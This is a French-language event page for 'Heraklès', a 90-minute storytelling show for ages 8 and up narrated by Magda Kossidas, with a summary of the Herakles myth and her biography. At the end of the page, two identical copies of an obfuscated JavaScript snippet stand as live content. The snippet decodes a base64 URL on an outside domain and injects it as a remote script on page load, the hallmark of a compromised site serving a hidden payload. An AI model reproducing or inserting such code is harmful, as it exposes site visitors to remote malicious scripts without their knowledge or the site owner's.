HERAKLES
Narration: MAGDA KOSSIDAS
Entrée : 8€
Tout public à partir de 8 ans
durée: 90 min
L’histoire:
« Il est fils de Zeus mais sa haute naissance est éclipsée par sa vaillance : à force de labeurs, il a conduit les hommes à la sérénité de vivre, abolissant pour eux l’épouvante des monstres ! » Euripide, Les Folies d’Heraklès Heraklès, de son premier nom Alcide, fils de Zeus et de la mortelle Alcmène, est l’un des héros les plus vénérés de la Grèce antique. La mythologie grecque lui prête un très grand nombre d’aventures qui le voient voyager à travers le monde connu des Doriens puis de toute la Méditerranée à partir de l’expansion de la grande Grèce, jusqu’aux Enfers, et dont les plus célèbres sont les douze travaux. Il apparaît déjà chez Homère, ce qui témoigne de l’ancienneté de sa geste héroïque. Contexte et portée : Heraklès, que les Latins appelaient Hercule, est le héros le plus célèbre et le plus populaire de la mythologie classique. Il représentait ce qui forçait le plus l’admiration des grecs : la force physique, une suprême confiance en soi, la sensibilité, le courage. Demi-dieu, surhomme, Heraklès n’en incarne pas moins l’humanité, envahi de remord et désirant réparer ses fautes. La fascination qu’exerce ce récit est en partie expliquée par son caractère initiatique, les épreuves subies par Heraklès renvoyant chacun à sa propre quête identitaire. Les récits qui lui sont consacrés constituent un cycle entier de la mythologie, en évolution permanente depuis l’époque préhellénique jusqu’à la fin de l’Antiquité.
Biographie de Magda Kossidas
Née en Grèce, Magda Kossidas est arrivée en France à l’âge de 18 ans. Après un parcours universitaire orienté vers l’histoire et les sciences de l’éducation, elle se consacre au conte et aux arts du récit. Elle a créé plusieurs spectacles et pris part à divers festivals culturels en France et à l’étranger, dans lesquels ses origines grecques tiennent une place prépondérante. Elle a également produit une série de spectacles destinés aux tout-petits et assure des formations d’initiation et de perfectionnement pour “apprendre à raconter aux tout-petits”. Son expérience de plus de dix ans de conte au sein des écoles l’a conduite à proposer une formation, destinée aux personnels en contact avec les enfants, amenant à réfléchir sur l’exploitation psycho- pédagogique des contes. Depuis 2005, elle a rejoint l’atelier Fahrenheit où elle travaille en collaboration avec Bruno de la Salle sur la narration et l’épopée.
(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();